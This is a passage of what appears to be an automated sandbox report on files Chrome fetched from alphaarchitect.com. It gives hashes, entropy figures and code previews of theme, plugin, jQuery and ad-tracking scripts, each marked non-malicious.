                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:Z0x0cFcl+6rQHDFpcFIYnQM6cpajeUzQ+qH+HWzVL416b3pt:Z0x0cFclZrQHDEFIYnQspIrQB+HWzVsc
                                                                                                                                                                                                                                                                        MD5:414CE02C794992C66159D9EC0458C92D
                                                                                                                                                                                                                                                                        SHA1:BC726B7413FFA9F8079A8837B4C157EB32764A27
                                                                                                                                                                                                                                                                        SHA-256:40E42DEA1E0688E6F0A7C05006F95031D21B82B1C602F2E5BD6CFABE5787FB0A
                                                                                                                                                                                                                                                                        SHA-512:FC36F2289455117081D015F06963B31E97640CCDBC922BC961C9F6488514034A450EFF1B0F6A14016929114483D5008C5C442273F78ABF18BEF160AD4BADCA5D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-container.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function fusionInitStickyContainers(){"function"==typeof jQuery.fn.stick_in_parent&&jQuery(".fusion-sticky-container").each(function(){fusionInitSticky(jQuery(this))})}function fusionInitSticky(e){var t=void 0===e.attr("data-transition-offset")?0:parseFloat(e.attr("data-transition-offset")),i=void 0===e.attr("data-sticky-offset")?0:e.attr("data-sticky-offset"),n=void 0!==e.attr("data-scroll-offset")&&parseFloat(e.attr("data-scroll-offset")),o={sticky_class:"fusion-container-stuck",bottoming:!0,offset_top:i,transition_offset:t,clone:!1},s="data-sticky-medium-visibility";jQuery("body").hasClass("fusion-disable-sticky")?e.data("sticky_kit")&&e.trigger("sticky_kit:detach"):"object"!=typeof fusion||"function"!=typeof fusion.isLarge||(fusion.isLarge()?s="data-sticky-large-visibility":fusion.isSmall()&&(s="data-sticky-small-visibility"),void 0!==e.attr(s)&&e.attr(s))?e.data("sticky_kit")||(n&&(o.scroll_transition=n),e.closest(".fusion-tb-header").length||e.closest(".fusion-tb-page-title-bar")
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):27
                                                                                                                                                                                                                                                                        Entropy (8bit):3.91211389097223
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:eOtLFajAHyzn:eO58jASzn
                                                                                                                                                                                                                                                                        MD5:74002CAEB753D2B652B466730E00F7D0
                                                                                                                                                                                                                                                                        SHA1:1D20B38EF75E7C383B33D677FC83DD8351BB32FB
                                                                                                                                                                                                                                                                        SHA-256:B3B8631CB468BADC4012A399BF6D49BC2F4FC4F2CCEF578A830234EB6B168DA1
                                                                                                                                                                                                                                                                        SHA-512:A2E2202A661BBC48C99F0180BF808D523C40FA3955F89932C274CA9108E734FDAF5AD40FF112F5D010DC7DA26961A9902102D8B3A95DFAB10F2880B3852EB090
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://match.prod.bidr.io/cookie-sync/fivebyfive?_bee_ppp=1
                                                                                                                                                                                                                                                                        Preview:unknown partner: fivebyfive
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2060), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2060
                                                                                                                                                                                                                                                                        Entropy (8bit):5.172673320849662
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:aRM3Pl9l3PRMq4d3P4Q/4Q3P4dzs3PdkI3kzBRG3PvyRC3PJndS8MDmedOJNdRSB:uSNzXLgcl6YOJNdRi
                                                                                                                                                                                                                                                                        MD5:7B10A7F00F377346529243B7B787241A
                                                                                                                                                                                                                                                                        SHA1:C8DE259E0CBEF95FEC00A4A19C0D61FBC1822161
                                                                                                                                                                                                                                                                        SHA-256:F4C0E513103A912AFD6C87C9448A31EC292ACC10E57D52CB34A53126797C1CCC
                                                                                                                                                                                                                                                                        SHA-512:7CFAB9FB25458069323743B23792CBD3AF8F9EEEAFB460D4DF053D659E9265CE7FA371EDBC7591DE7736A69D2B9B7EBCD00DF76AD7FFBEB99882D5A4E13643A0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(e){const t={slide:{prev:{translate:[0,"-100%",0],opacity:0},next:{translate:[0,"100%",0],opacity:0}},slide_down:{prev:{translate:[0,"100%",0],opacity:0},next:{translate:[0,"-100%",0],opacity:0}},slide_left:{prev:{translate:["-100%",0,0],opacity:0},next:{translate:["100%",0,0],opacity:0}},slide_right:{prev:{translate:["100%",0,0],opacity:0},next:{translate:["-100%",0,0],opacity:0}},stack:{prev:{translate:[0,"60px","-30px"],scale:.7,opacity:0},next:{translate:[0,"100%",0]}},zoom:{prev:{scale:1.3,opacity:0},next:{scale:.7,opacity:0}},"slide-zoom-out":{prev:{translate:[0,"-100%",0],scale:1.5,opacity:0},next:{translate:[0,"100%",0],scale:1.5,opacity:0}},"slide-zoom-in":{prev:{translate:[0,"-100%",0],scale:.8,opacity:0},next:{translate:[0,"100%",0],scale:.8,opacity:0}}};function a(a){const o=a.dataset.type||"container",n=a.dataset.animation||"fade",s="fade"===n?"fade":"creative";let i="creative"===s?t[n]:"";const c="no"===a.dataset.loop,l=Number(a.dataset.slideshowSpeed)||5e3,r=Num
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3570), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3570
                                                                                                                                                                                                                                                                        Entropy (8bit):5.0524554954544785
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:1vw8VQq6KWorQfINES1EXQxnxsxixSrij2TEKyEy:WYQq6KVUfHSionKUMrij2YK9y
                                                                                                                                                                                                                                                                        MD5:9EAAE8BD6AAFED95E0187FFD478A3532
                                                                                                                                                                                                                                                                        SHA1:46ED6CAEC5004B8DB8064BA2BA5138E7444FB15D
                                                                                                                                                                                                                                                                        SHA-256:682FFD7D5677505F871C8ADCF4365FC8AA30C77AADDAA1C4D8338D1E02D30BD7
                                                                                                                                                                                                                                                                        SHA-512:CFCB93F0BD6240853697A6A3833AEE64670E7EAF516F13CB20B16B05A94BEAD1224520E5BADCE35003EA5E267B10E3C03829F444D077057AEAA0C2903CF31C18
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-responsive-typography.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function fusionCalculateResponsiveTypeValues(e,t,i,n){fusionSetOriginalTypographyData(n)}function fusionSetOriginalTypographyData(e){var t="string"==typeof e&&-1!==e.indexOf("fusion-slider"),i=fusion.getElements(e);jQuery(i).each(function(e,i){var n,o,s,a,r;n=fusionTypographyVars.typography_factor,i.classList.contains("fusion-responsive-typography-calculated")?i.style.getPropertyValue("--fontSize")&&""!==i.style.getPropertyValue("--fontSize")||i.classList.remove("fusion-responsive-typography-calculated"):null!==i.closest(".fusion-slider-revolution")||null!==i.closest(".rev_slider")||null!==i.closest("#layerslider-container")||null!==i.closest(".ls-avada.ls-container")||null!==i.closest(".fusion-slider-container")&&!t||(s=window.getComputedStyle(i),a=!!s["font-size"]&&parseFloat(s["font-size"]),r=!!s["line-height"]&&parseFloat(s["line-height"]),!1!==a&&!1!==r&&(r=Math.round(r/a*100)/100,i.style.setProperty("--fontSize",a),i.setAttribute("data-fontsize",a),i.style.lineHeight=r,i.setAttri
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):742
                                                                                                                                                                                                                                                                        Entropy (8bit):5.0542422744801865
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:2Nss5N8a/pCAYONJ1FRwDpituWYEu3ChWKA2scMjxIS4RWUkE+32FeWRWm7Ps7eQ:2Nf5N8+9YCJ1FRwMtDYjSIK2cMjxIS4g
                                                                                                                                                                                                                                                                        MD5:B67241C4E15000A87197690020450B0E
                                                                                                                                                                                                                                                                        SHA1:99451BB82B263DD069176F8B5B168EDB3BD7B6E5
                                                                                                                                                                                                                                                                        SHA-256:B5334533B620FBAD01C58B7A4374839BF85832A1433077DD103BC6CE4D31FF8F
                                                                                                                                                                                                                                                                        SHA-512:DDCC2DF9C9964896AEDB04E905AF2F9CE6DD957751073B87AD80743D44AA2B107E94FBA4BE1198D6FF75CC213F75D96DDB883DB5F3E37D09D88FFF9D70ED6B5B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:(function (w, d) {. var dynamicPixel = function() {. var pixelURL = "https://a.remarketstats.com/px/smart/?c=2645100a8c95db0&seg=";. var urlPath = w.location.pathname.substr(1).replace(/\/+$/, '');. if (urlPath === "") { urlPath = "home"; }. console.log(urlPath);. var segmentValue = urlPath;. var script = d.createElement('script');. if (pixelURL.indexOf("seg=") === -1) {. pixelURL = pixelURL + "seg=";. }. script.src = pixelURL + escape(segmentValue);. d.getElementsByTagName('script')[0].parentNode.appendChild(script);. };.. var body = d.getElementsByTagName('body')[0];. if (body) {. dynamicPixel();. } else {. w.onload = function () {. dynamicPixel();. }. }.})(window, document);.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12175), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):12175
                                                                                                                                                                                                                                                                        Entropy (8bit):5.212777482235568
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:Tb48U1ckoIi1/XnGTzOy/CmW/aKOfgD+9Yb:n48U1YvGTKy/q/aKEgDP
                                                                                                                                                                                                                                                                        MD5:5AD2BA164F879FCBE172FF0D3BB2942A
                                                                                                                                                                                                                                                                        SHA1:AE4A19C4A5A0930366EF7CF263989027982DE627
                                                                                                                                                                                                                                                                        SHA-256:37ED90D7FD60A93CA259597140330BD62C8D303F50454FBA6C78824AA42BC0BF
                                                                                                                                                                                                                                                                        SHA-512:299861BF52FE125B4703D70B133205B3BD6840217757AE3E5E73DFDC49C464E6B682152FD53D462B44CC8A01617445CEDB58E8DCF0EDDFCCE93CF2E3FA0A6B7D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function UM_domenus(){jQuery(".um-dropdown").each(function(e,o){UM.dropdown.setPosition(o)})}function UM_check_password_matched(){jQuery(document).on("keyup","input[data-key=user_password],input[data-key=confirm_user_password]",function(e){var o=jQuery("input[data-key=user_password]").val(),a=jQuery("input[data-key=confirm_user_password]").val(),t=jQuery("input[data-key=user_password],input[data-key=confirm_user_password]");o||a?o!==a?t.removeClass("um-validate-matched").addClass("um-validate-not-matched"):t.removeClass("um-validate-not-matched").addClass("um-validate-matched"):t.removeClass("um-validate-matched").removeClass("um-validate-not-matched")})}function um_responsive(){jQuery(".um").each(function(){(element_width=jQuery(this).width())<=340?(jQuery(this).removeClass("uimob340"),jQuery(this).removeClass("uimob500"),jQuery(this).removeClass("uimob800"),jQuery(this).removeClass("uimob960"),jQuery(this).addClass("uimob340")):element_width<=500?(jQuery(this).removeClass("uimob340")
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):87553
                                                                                                                                                                                                                                                                        Entropy (8bit):5.262620498676155
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKO:sHNwcv9VBQpLl88SMBQ47GKO
                                                                                                                                                                                                                                                                        MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                                                                                                                                                                                                                                        SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                                                                                                                                                                                                                                        SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                                                                                                                                                                                                                                        SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                                                                                                                                                                                                                                                                        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (502), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):502
                                                                                                                                                                                                                                                                        Entropy (8bit):4.852813095123636
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:zAWrUzPHMxLvzg8TMjHvreKzZjzjHvL7B1kVMjHvpPLYK:zAWrUzPsxjzg8AjPrewZXjPL7bjPpZ
                                                                                                                                                                                                                                                                        MD5:41FB5898F76EB2B0C532F12502A8E104
                                                                                                                                                                                                                                                                        SHA1:282C0AA45DDC16B0A5FF8BF7405E2829CB13016E
                                                                                                                                                                                                                                                                        SHA-256:5FC6FD5AACBE2FD6EA1776496DADF4F8D9CED35317FC9BD335A9B72D6191398E
                                                                                                                                                                                                                                                                        SHA-512:19E3C8BA2D8708478AF21F3B0904C7A0B6469154409E68E554C6106E33A47F8BACC7B8EB57678EABC50BB171C018BA5E212D988FCD2B3FF42C811186873E43EE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-tabs-widget.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:jQuery(document).on("ready fusion-widget-render-Fusion_Widget_Tabs",function(){jQuery(".fusion-tabs-widget .fusion-tabs-nav li a").on("click",function(n){var t=jQuery(this).data("link");n.preventDefault(),jQuery(this).parents(".fusion-tabs-nav").find("li").removeClass("active"),jQuery(this).parent().addClass("active"),jQuery(this).parents(".fusion-tabs-widget").find(".fusion-tab-content").hide(),jQuery(this).parents(".fusion-tabs-widget").find('.fusion-tab-content[data-name="'+t+'"]').fadeIn()})})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2541), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2541
                                                                                                                                                                                                                                                                        Entropy (8bit):5.183290847271813
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:hBrL99kAAJ6rT99bi+BfKNY/IGTIffJmIpLD9cg15adkiIDlhB2fFWfoYZm9ZcM5:hv9N93pKNY/IGkffJmI5xakiIxhUquld
                                                                                                                                                                                                                                                                        MD5:A3B61A037278D8B392CBF89C25ABB51E
                                                                                                                                                                                                                                                                        SHA1:C4E8E93B95F835B81C064773DD7F6687B8EFC168
                                                                                                                                                                                                                                                                        SHA-256:B2F035B8A7FD26BEF558DF9C6759509369379BEA8A2899FD16B9643138A20B5A
                                                                                                                                                                                                                                                                        SHA-512:90D69FA5516F0EA5BA6240421112F8BBB17C1300439C7F5F51B2B4F3C9C8D156A491EBB9E8A4499D03ACAF00F0D131DC34892F128AB5CDF7F02E3D1D7CF4792C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/common.min.js?ver=2.9.1
                                                                                                                                                                                                                                                                        Preview:"object"!=typeof window.UM&&(window.UM={}),"object"!=typeof UM.common&&(UM.common={}),UM.common={tipsy:{init:function(){"function"==typeof jQuery.fn.tipsy&&(jQuery(".um-tip-n").tipsy({gravity:"n",opacity:1,live:"a.live",offset:3}),jQuery(".um-tip-w").tipsy({gravity:"w",opacity:1,live:"a.live",offset:3}),jQuery(".um-tip-e").tipsy({gravity:"e",opacity:1,live:"a.live",offset:3}),jQuery(".um-tip-s").tipsy({gravity:"s",opacity:1,live:"a.live",offset:3}))},hide:function(){"function"==typeof jQuery.fn.tipsy&&(jQuery(".um-tip-n").tipsy("hide"),jQuery(".um-tip-w").tipsy("hide"),jQuery(".um-tip-e").tipsy("hide"),jQuery(".um-tip-s").tipsy("hide"),jQuery(".um .tipsy").remove(),jQuery(".um-page .tipsy").remove())}},datetimePicker:{init:function(){jQuery(".um-datepicker:not(.picker__input)").each(function(){e=void 0!==(elem=jQuery(this)).attr("data-disabled_weekdays")&&""!=elem.attr("data-disabled_weekdays")&&JSON.parse(elem.attr("data-disabled_weekdays"));var e,t=null,i=(void 0!==elem.attr("data-ye
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (848), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):848
                                                                                                                                                                                                                                                                        Entropy (8bit):4.996471211787706
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:t81CjPQk7QkjsV5qUq9Dv0GXWPLvUQbVQbA4+SPQk7QfI85qUq9Ry:NG5qVFuDBE65qVK
                                                                                                                                                                                                                                                                        MD5:EB94264335215BE9514298739E95272E
                                                                                                                                                                                                                                                                        SHA1:D0674168C4B3C641222F89C68240CEBA62144DC0
                                                                                                                                                                                                                                                                        SHA-256:ACBC257B1003FF58F518EA5C0DA86FA1F1731300E6958C244133A1D904F17B77
                                                                                                                                                                                                                                                                        SHA-512:A84B75EC14A60848F195883F9D188F4040CF9894D05F91F2621D99FA4A533AE01FC3E4EABA602A440617FCC3322F214052FB963627D3B252FDBE37D3CCE224DA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-tooltip.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function fusionInitTooltips(){jQuery('[data-toggle="tooltip"]').each(function(){var e;e=jQuery(this).parents(".fusion-header-wrapper").length?".fusion-header-wrapper":jQuery(this).parents("#side-header").length?"#side-header":"body",(!cssua.ua.mobile||cssua.ua.mobile&&"_blank"!==jQuery(this).attr("target"))&&jQuery(this).tooltip({container:e})})}jQuery(window).on("load",function(){fusionInitTooltips()}),jQuery(window).on("fusion-element-render-fusion_text fusion-element-render-fusion_social_links",function(e,t){var i,n=jQuery('div[data-cid="'+t+'"]').find('[data-toggle="tooltip"]');i=n.parents(".fusion-header-wrapper").length?".fusion-header-wrapper":n.parents("#side-header").length?"#side-header":"body",n.each(function(){(!cssua.ua.mobile||cssua.ua.mobile&&"_blank"!==jQuery(this).attr("target"))&&jQuery(this).tooltip({container:i})})})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2807)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4734
                                                                                                                                                                                                                                                                        Entropy (8bit):5.362642809551275
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:PK2wGpwPCyDFZ5a8im39aR0fzhmXjmzP+iZ+i3oxnTL+p:PHwGNyBZ5adgbhKjuPVLoxnTap
                                                                                                                                                                                                                                                                        MD5:A19EB6C48892AE84E0F0743D9033D490
                                                                                                                                                                                                                                                                        SHA1:C8C1EBB87350330FF642C60E89FCD2B0013CF79A
                                                                                                                                                                                                                                                                        SHA-256:370763B6BB85568EFC3C2F049341DD7196A8E3ACD4478076806722C1766ECAB4
                                                                                                                                                                                                                                                                        SHA-512:94AF90500B15BD79F3F5C85603DBC480D22B9C86192D45C4009392EAA55A1F11C9267E797FAC4E214FDE5B241F9149F75612FA1235D0C51DA9AA975CB785DE86
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://a.clickcertain.com/px/?c=2645100a8c95db0&rid=35b401bb-dd38-4632-8412-1dce28eac56b
                                                                                                                                                                                                                                                                        Preview:(function(){var a;a='c=2645100a8c95db0&host=a.clickcertain.com&wld=x.clickcertain.com&ccid=355cc50d-f67c-485f-9153-f0a0ddff6935&geo=US&rid=31b16e7e-ff08-4b9d-b9e3-01d6dbe95c13';(function(){var b,c,d,e,f,g,h,i,j,k,l,m,n;k=function(a){var b,c,d,e;b=[];for(c=d=0,e=a;0<=e?d<e:d>e;c=0<=e?++d:--d)b.push(c);return b;};i=function(a){var b,c,d,e,f;b=a.split("&");f={};for(c=0,d=b.length;c<d;c++){e=b[c];e=e.split("=");f[e[0]]=e[1];}return f;};g=function(a){var b,c,d,e,f,g;d=a[0];b=a[1];g=k(d.length);for(e=0,f=d.length;e<f;e++){c=d[e];g[d[c]]=b[c];}return g.join('');};h=function(){var b,c;b="x.clickcertain.com";c=i(a).wld;if(c!=null)return c;return b;};l=function(a){var b,c,d,e;d='adnxs';b=['secure'];b.push(d);e='com';b.push(e);if('https:'===document.location.protocol){if(a.indexOf("https")===-1)a=a.replace("http://","https://");c=h();if(a.indexOf(c)>-1)a=a.replace(c,b.join('.'));}return a;};e=function(a){var c;a=b.decode(a);c=typeof JSON!=="undefined"&&JSON!==null?JSON.parse(a):void 0;if(c==null)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):161
                                                                                                                                                                                                                                                                        Entropy (8bit):4.580019668141676
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:UGDX9L3oPlRqLVWrAifp3i6ZfYJ6a8MDXAiJ7WXa/5vf4mM:UGDNLoPlRqxL8p3jY8M0q7Wu1Q7
                                                                                                                                                                                                                                                                        MD5:C12BAA4531AFDBFC0486131A6CE4C112
                                                                                                                                                                                                                                                                        SHA1:076BD55231BE5DB2170E79B0263F16EF4DC46991
                                                                                                                                                                                                                                                                        SHA-256:4EA61B2F9D14A61CC6BEB17A978D9D9CE25826628D4DAB8DC24E933B854D1009
                                                                                                                                                                                                                                                                        SHA-512:3D695709D0EAB8F90296D2198815A282BF80132FDD75DA2D745B80B4910687E2295D74087F7760D422BDFCCB32A1CF76EA40DD5C5A24762B9DF873AD485C7D3A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://www.printfriendly.com/api/v3/domain_settings/a?callback=pfMod.saveDSSettings&hostname=alphaarchitect.com&client_version=client
                                                                                                                                                                                                                                                                        Preview:/**/pfMod.saveDSSettings({"domain_settings":{"ad_free":true,"brand_free":false,"ad_type":"ad_free","classification":"TBD","redirect":false,"bk_redirect":false}})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1488), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1488
                                                                                                                                                                                                                                                                        Entropy (8bit):5.209358371090319
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:FPeQL5YHkHyC6rU2H+KzA2FyaZHehAQgDC22GuRWUESk5bq4OCvDW:FF/HynA2z1EaZHAVxwUDkBlXDW
                                                                                                                                                                                                                                                                        MD5:AFFC037643FFCAEECA8F70B6E8CD0345
                                                                                                                                                                                                                                                                        SHA1:5636027C3E9EF61C558BEA32EB2CAFCDE5A8C738
                                                                                                                                                                                                                                                                        SHA-256:F2955A45CFD9EEDB8D37D2445970925F87F7BB38D8623C621439862A6431FD00
                                                                                                                                                                                                                                                                        SHA-512:64A8161C92B7F548B86900684D7195AE0D92A1D64FAB4F038EBB757329B0CC8E86252F2F67D31D1D650BF1AC2A85263F2D015D32470EC9D37A4B248EA8320F6C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://tag.trovo-tag.com/ldc.js?pid=193f0456&aid=193f0456
                                                                                                                                                                                                                                                                        Preview:"use strict";!function(a,i,l,d){const s="ldcDataLayer";a[s]=a[s]||[];Object.defineProperty(a[s],"push",{value:function(...e){var t=Array.prototype.push.apply(this,e);return console.log("eventConsumer",e),t}});function t(){console.log("instrument",l,d);let e=function(t){for(let e=0;e<a[s].length;e++){var[n,r]=a[s][e];if(n===t)return r}},t=function(){var n=(new Date).getTime(),r="undefined"!=typeof performance&&performance.now&&1e3*performance.now()||0;return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,function(e){var t=16*Math.random();return 0<n?(t=(n+t)%16|0,n=Math.floor(n/16)):(t=(r+t)%16|0,r=Math.floor(r/16)),("x"===e?t:3&t|8).toString(16)})};var n,r,o;n=l,(r=new URLSearchParams).set("rurl",window.location.href),r.set("ref",i.referrer),r.set("v","js-0.1.0"),r.set("aid",d),(o=e("externalId"))&&r.set("external_id",o),r.set("rid",e("rid")||t()),o="https://tag.trovo-tag.com/"+n+"?"+r.toString(),(n=i.createElement("iframe")).setAttribute("src",o),n.setAttribute("height","1"),n.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2282), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2282
                                                                                                                                                                                                                                                                        Entropy (8bit):5.066335914621365
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:HSHQZqYWKR3hA7CGA9AhkG4GbeEzUGrUIzrU5mQyYRYxjYcFinFUxdXYyOYMMY3i:HuYtUi27zKCcfusqM1e2i
                                                                                                                                                                                                                                                                        MD5:A3AC1E89E0CD755B8FB471A772CFED82
                                                                                                                                                                                                                                                                        SHA1:8DA1263AB74F7C24C47704B68B926140DD1292FE
                                                                                                                                                                                                                                                                        SHA-256:9F2D06D1E827A9C7440CAC92D2677A36A9D798FA4BB0F1E01E6F7DC5E6204741
                                                                                                                                                                                                                                                                        SHA-512:549F30F46973194317164EDBC5BB729614870CD435AA58DD266EFE3CCA06B51177A9B3C74F295A29B97713A8962BC40A9B526930FE26426722B05E3137CCE034
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
